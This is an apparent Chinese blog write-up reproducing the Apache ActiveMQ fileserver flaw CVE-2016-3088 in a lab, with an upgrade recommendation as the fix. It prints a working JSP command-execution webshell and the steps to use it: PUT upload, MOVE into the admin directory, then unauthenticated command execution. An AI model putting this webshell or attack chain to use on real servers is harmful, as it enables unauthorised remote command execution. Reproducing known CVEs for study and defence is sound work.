Apache ActiveMQ任意文件寫入漏洞(CVE-2016-3088)復現(xiàn)
一、漏洞描述
該漏洞出現(xiàn)在fileserver應用中,漏洞原理:ActiveMQ中的fileserver服務允許用戶通過HTTP PUT方法上傳文件到指定目錄。Fileserver支持寫入文件(不解析jsp),但是支持移動文件(Move)我們可以將jsp的文件PUT到Fileserver下,然后再通過Move指令移動到可執(zhí)行目錄下訪問。
二、漏洞影響版本
Apache ActiveMQ 5.0.0 - 5.13.2
三、漏洞環(huán)境搭建
1、官網下載apache-activemq-5.7.0-bin.tar 下載地址:http://activemq.apache.org/download-archives.html
2、解壓
3、啟動,進入bin目錄下,運行./activemq start
4、瀏覽器訪問http://192.168.10.149:8161/,如下圖可以看到成功搭建環(huán)境
四、漏洞復現(xiàn)
1、PUT上傳一個jsp的webshell到fileserver目錄,下圖可以看到成功上傳jsp文件
Jsp文件內容:
<%@ page import="java.io.*"%> <% out.print("Hello</br>"); String strcmd=request.getParameter("cmd"); String line=null; Process p=Runtime.getRuntime().exec(strcmd); BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream())); while((line=br.readLine())!=null){ out.print(line+"</br>"); } %>
2、瀏覽器訪問http://192.168.10.149:8161/fileserver/1.jsp,下圖可以看到fileserver目錄下的webshell沒有被解析,說明fileserver目錄沒有執(zhí)行權限
3、利用該版本存在物理路徑泄露漏洞,爆一下絕對路徑
4、利用Move方法將webshell移入admin目錄下,如下圖所示成功把文件移入到admin目錄
5、利用該版本存在的未授權訪問漏洞,不用登錄,訪問http://192.168.10.149:8161/admin/1.jsp?cmd=ls,下圖可以看到成功執(zhí)行命令
五、漏洞防御
1、ActiveMQ Fileserver 的功能在 5.14.0 及其以后的版本中已被移除。建議用戶升級至 5.14.0 及其以后版本。
---------------------------------------------------------------------------------
參考: https://www.secpulse.com/archives/60064.html
總結
以上所述是小編給大家介紹的Apache ActiveMQ任意文件寫入漏洞(CVE-2016-3088)復現(xiàn),希望對大家有所幫助,如果大家有任何疑問請給我留言,小編會及時回復大家的。在此也非常感謝大家對腳本之家網站的支持!
如果你覺得本文對你有幫助,歡迎轉載,煩請注明出處,謝謝!
相關文章
Ubuntu上使用Netdata設置實時性能監(jiān)控的詳細流程
Netdata通過可擴展的Web儀表板提供準確的性能監(jiān)控,可以顯示Linux系統(tǒng)上的流程和服務。這篇文章給大家介紹Ubuntu上使用Netdata設置實時性能監(jiān)控的流程,感興趣的朋友一起看看吧2018-08-08Linux使用crontab定時執(zhí)行腳本任務的流程詳解
在Linux中可以使用crontab來定時執(zhí)行腳本,crontab是一個用于管理定時任務的工具,可以讓在特定的時間間隔內自動運行腳本或命令,本文我們將使用cron來定期執(zhí)行一個寫入命令或腳本,需要的朋友可以參考下2023-10-10Centos 6.8編譯安裝LNMP環(huán)境(Nginx+MySQL+PHP)教程
這篇文章主要介紹了關于CentOS 6.8中編譯安裝LNMP環(huán)境的相關資料,LNMP即Linux,Nginx,MySQL,PHP,文中通過一步步的步驟介紹的非常詳細,需要的朋友可以參考借鑒,下面來一起看看吧。2017-03-03CentOS7使用yum安裝PostgreSQL和PostGIS的方法
這篇文章主要介紹了CentOS7使用yum安裝PostgreSQL和PostGIS的方法,非常不錯,具有一定的參考借鑒價值,需要的朋友可以參考下2019-09-09